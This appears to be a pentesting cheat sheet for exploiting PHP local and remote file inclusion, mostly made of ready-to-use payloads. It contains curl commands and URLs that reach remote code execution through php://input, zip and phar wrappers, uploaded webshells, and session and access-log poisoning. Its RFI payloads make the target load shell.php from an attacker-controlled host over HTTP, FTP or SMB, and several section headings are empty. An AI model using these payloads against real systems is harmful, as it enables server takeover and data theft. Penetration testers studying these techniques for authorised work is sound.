File Inclusion
PHP Wrappers
Data
Read file:
RCE:
Input
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"
Expect (not common)
Remote File Inclusion (RFI)
On the attacker's server:
Payload:
http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id
Using FTP
On the attacker's server:
Payload:
http://<SERVER_IP>:<PORT>/index.php?language=ftp://<OUR_IP>/shell.php&cmd=id
Using SMB
Payload:
http://<SERVER_IP>:<PORT>/index.php?language=\\<OUR_IP>\share\shell.php&cmd=whoami
LFI and File Uploads
Image
Payload:
http://<SERVER_IP>:<PORT>/index.php?language=./profile_images/shell.gif&cmd=id
ZIP
Payload:
http://<SERVER_IP>:<PORT>/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id
Phar
shell.php
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
Payload:
http://<SERVER_IP>:<PORT>/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
Log Poisoning
PHP Session Poisoning
Location to session file in server:
/var/lib/php/sessions/sess_<PHPSESSID cookie value>
Payload:
http://<SERVER_IP>:<PORT>/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
Server Log Poisoning
Send PHP code to log file:
echo -n "User-Agent: <?php system(\$_GET['cmd']); ?>" > Poison
curl -s "http://<SERVER_IP>:<PORT>/index.php" -H @Poison
Execute command:
http://<SERVER_IP>:<PORT>/index.php?language=/var/log/apache2/access.log&cmd=id
Wordlists
Webroot path wordlist for Linux
Webroot path wordlist for Windows